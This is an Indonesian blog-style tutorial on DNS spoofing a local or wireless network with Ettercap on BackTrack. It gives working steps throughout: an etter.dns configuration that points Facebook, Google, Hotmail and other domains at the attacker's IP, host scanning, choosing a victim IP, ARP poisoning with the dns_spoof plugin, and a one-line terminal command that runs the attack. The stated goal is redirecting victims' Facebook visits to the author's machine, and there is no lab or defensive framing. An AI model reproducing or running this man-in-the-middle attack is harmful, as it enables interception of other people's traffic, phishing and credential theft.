Dns spoof dengan ettercap gui

dulu saya pernah posting cara DNS spoofing di Windows menggunakan Cain and Abel...

sekarang saya mau share Dns spoofing di Backtrack dengan Ettercap...

kebetulan masih byk yang belum tau dengan statusbaru.com ( jejaring sosial buatan Indonesia ) makanya kita alihkan www.facebook.com  pada jaringan kabel ( LAN ) ataupun Wireles...

berikut POC nya

Atur dulu dns spoof nya
buka console lalu ketikkan perintah

locate etter.dns

untuk mengetahui letak pengaturan ettercap

kemudian atur dns spoofnya di pengaturan etter.dns

gedit /usr/local/share/ettercap/etter.dns

rubah ipnya menjadi ip kamu disini ip komputer saya 192.168.1.21
rubah di bagian ini

 ################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
www.mercadolivre.com.br A 192.168.1.74
*.globo.com        A   192.168.1.74
globo.com          A   192.168.1.74
www.msn.com        A   192.168.1.74
www.hotmail.com    A   192.168.1.74
*.hotmail.com      A   192.168.1.74
www.globo.com      A   192.168.1.74
www.orkut.com      A   192.168.1.74
*.orkut.com        A   192.168.1.74
www.google.com     A   192.168.1.74
*.google.com       A   192.168.1.74
microsoft.com      A   192.168.1.74
*.microsoft.com    A   192.168.1.74
www.facebook.com      A   192.168.1.74
*.facebook.com        A   192.168.1.74
www.microsoft.com  PTR 192.168.1.74      # Wildcards in PTR are not allowed

Kita akan spoofing facebook apabila ada korban yang membuka facebook akan di arahkan ke ip kita

KALAU INGIN SEMUA SITUS DI SPOOFING CUKUP TAMBAHKAN
*A (ip pc anda) misal = *A 192.168.1.74
pada bagian bawah sendiri.Di bawah #vim:ts=8:noexpandtab

setelah itu save dengan menekan cxtr+x lalu y dan enter
Sekarang tinggal memulai spoof dengan ettercap dengan gui agar hasil maksimal untuk spoof_dns
buka terminal dan jalankan ettercap dengan perintah

ettercap -G 

lalu pilih sniff > uniffied sniffing lalu rubah interface kalian
disini saya menggunakan wlan2

lalu pilih host > scan host setelah berhasil scan lalu liat host > host list

korbann saya ada pada ip 192.168.1.20

setelah itu pilih mitm > arp poisoning > lalu centang sniff remote connection lalu ok

 dan pilih plugins > manage the plugins > pilih dns_spoof dengan menklik 2x

sekarang waktunya untuk memulai meracuni ip
dengan memilih opsi start > start sniffing
sukses spoofing

 GOOD LUCK . ..

atau kalau pingin cepet lewat terminal juga bisa
buka terminal lalu ketikkan perintah

ettercap -Tqi wlan0 -P dns_spoof -M arp // //